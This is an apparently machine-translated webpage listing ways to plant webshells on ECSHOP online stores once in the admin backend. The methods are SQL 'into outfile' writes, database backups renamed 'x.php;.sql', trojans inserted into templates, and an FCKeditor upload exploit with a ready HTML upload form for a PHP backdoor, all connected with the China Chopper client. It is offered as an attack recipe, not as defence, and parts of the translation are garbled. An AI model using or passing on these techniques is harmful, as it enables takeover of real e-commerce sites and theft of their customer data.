ECSHOP summarizes "go" with shell

Source: Internet
Author: User
Tags upload php

Ecshop background shell summary ecshop shell

I,

System ==> database management ==> SQL query (the physical path can be exposed ):

=================== Failed to create the table, shell =============================

 

Show databases; use Database Name; create a (cmd text not null); insert into a (cmd) values (''); select cmd from a into outfile 'export path '; drop table if exists;

=========================== Failed to create the table, shell ===============================

2. Leave a message on the front-end about a Trojan horse: Go to the background system ==> database management ==> data backup ==> select Custom backup, select the table ecs_feedback (the table storing the message)

Backup File Name: x. php;. SQL (an error occurred in the form of x. php. SQL. The connection to the kitchen knife fails)

Then the kitchen knife is linked successfully.

Http://www.baiduahck.com/data/sqldata/x.php;. SQL

III,

1. Add a member. insert a sentence to the member name: enter other words as needed. 2. System ==> database management ==> data backup-custom backup-select "XXX_users" (XXX varies by site and is the data prefix) 3. the backup file name is mm. php ;. SQL 4. Connect a single sentence client to mm. php ;. SQL, address is generally http://baiduhack.com/data/sqldata/mm.php;. SQL

IV ,(

Template management ==> database project management ==> select myship. lbi delivery method.

Add a line of code at the end of the file content: Kitchen Knife link http://www.baiduhack.com/myship.php successful.

Note: Some servers fail to filter eval.

V./shortdes/fckeditor/editor/filemanager/connectors/php/upload. php/shortdes/fckeditor/editor/filemanager/connectors/php/connector. php/shortdes/fckeditor/editor/filemanager/connectors/test.html

Http: // url/shortdes/fckeditor/editor/filemanager/connectors/test.html

There is no restriction on Media when the code is omitted. Direct Type = Media uploads your decrypted webshell access path

XXOO is not available if you do not log on to the background.

EXP:

<form id="frmUpload" enctype="multipart/form-data" action="/includes/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media" method="post">Upload a new file:<br><input type="file" name="NewFile" size="50"><br><input id="btnUpload" type="submit" value="Upload"></form>

Upload PHP horse directly

The file address is:

/Images/upload/Media/xx. php

VI,

Upload a txt file without filtering any function. So I used php file operations... Insert the above Code into myship. ini in the library project management. Open http: // url/myship. php and generate a distant.php;a.txt kitchen knife connection under http: // url/data/directory... Done ..

7. Go to the backend-system settings-Flash Player management-directly upload x. php

This option is unavailable in ecshop V2.7.2.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.